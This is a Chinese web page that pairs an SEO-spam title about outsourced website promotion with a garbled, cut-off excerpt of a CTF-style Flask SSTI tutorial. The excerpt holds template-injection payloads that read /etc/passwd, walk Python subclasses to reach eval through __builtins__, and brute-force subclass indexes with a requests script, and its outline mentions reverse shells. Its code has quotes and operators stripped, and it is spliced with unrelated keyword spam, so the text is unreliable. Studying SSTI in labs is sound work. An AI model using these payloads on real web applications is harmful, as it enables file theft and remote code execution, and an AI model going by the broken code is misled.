如何将重庆慕尚网站建设作为网站推广优化的外包服务？

网站推广优化外包,重庆慕尚网站建设,济南网站建设方案咨询,企业网站配色绿色配什么色合适放心#xff0c;我会一直陪着你 一.知识一.在终端的一些指令1.虚拟环境2.docker容器二.SSTI相关知识介绍1.魔术方法2.python如何执行cmd命令3.SSTI常用注入模块(1)文件读取(2)内建函数eval执行命令(3)os模块执行命令(4)importlib类执行命令(5)linecache函数执行命令(6)subproc… 放心我会一直陪着你 一.知识一.在终端的一些指令1.虚拟环境2.docker容器二.SSTI相关知识介绍1.魔术方法2.python如何执行cmd命令3.SSTI常用注入模块(1)文件读取(2)内建函数eval执行命令(3)os模块执行命令(4)importlib类执行命令(5)linecache函数执行命令(6)subprocess.Popen类执行命令 三.绕过过滤1.双大括号2.无回显(1)反弹shell(2)带外注入(做不了×)(3)纯盲注 四.实例1.eval 二.实例[HNCTF 2022 WEEK2]ez_SSTI[安洵杯 2020]Normal SSTI 一.知识 一.在终端的一些指令 1.虚拟环境 进入虚拟环境flask1 cd /opt/flask1 source ./bin/activate退出虚拟环境 deactivate2.docker容器 自动检测 sudo docker run -p 18022:22 -P 18080:80 -i -t mcc0624/flask_ssti:last bash -c /etc/rc.local; /bin/bash查看所有容器 docker ps -a关闭容器 docker stop CONTAINER ID开启容器 docker start CONTAINER ID更多命令:Docker常用命令之容器命令 二.SSTI相关知识介绍 ${7*7}a{*comment*}b ${z.join(ab)}{{7*7}} {{7*7}}1.魔术方法 __class__#查找当前类型的所属对象 __base__#沿着父子类的关系往上走一个 __mro__#查找当前类对象的所有继承类 __subclasses__()#查找父类下的所有子类 __init__#查看类是否重载,重载是指程序在运行时就已经加载好了这个模块到内存中,如果出现wrapper字眼,说明没有重载 __globals__#函数会议字典的形式返回当前对象的全部全局变量2.python如何执行cmd命令 python如何执行cmd命令 3.SSTI常用注入模块 (1)文件读取 ①查找子类 _frozen_importlib_external.FileLoaderclass _frozen_importlib_external.FileLoader②找第几个时的python脚本: import requests url input(请输入URL链接) for i in range(500):data {name:{{().__class__.__base__.__subclasses__()[str(i)]}}}try:response requests.post(url,datadata)#print(response.text)if response.status_code 200:if _frozen_importlib_external.FileLoaderin response.text:print(i)except:pass③读取 {{.__class__.__mro__[1].__subclasses__()[79][get_data](0,/etc/passwd)}}(2)内建函数eval执行命令 ①内建函数:python在执行脚本时自动加载的函数 看是否有eval {{.__class__.__base__.__subclasses__()[117].__init__.__globals__[__builtins__]}}②python脚本查看可利用内建函数eval的模块 import requests url input(请输入URL链接) for i in range(500):data {name:{{().__class__.__base__.__subclasses__()[str(i)].__init__.__globals__[__builtins__]}}}try:response requests.post(url,datadata)#print(response.text)if response.sta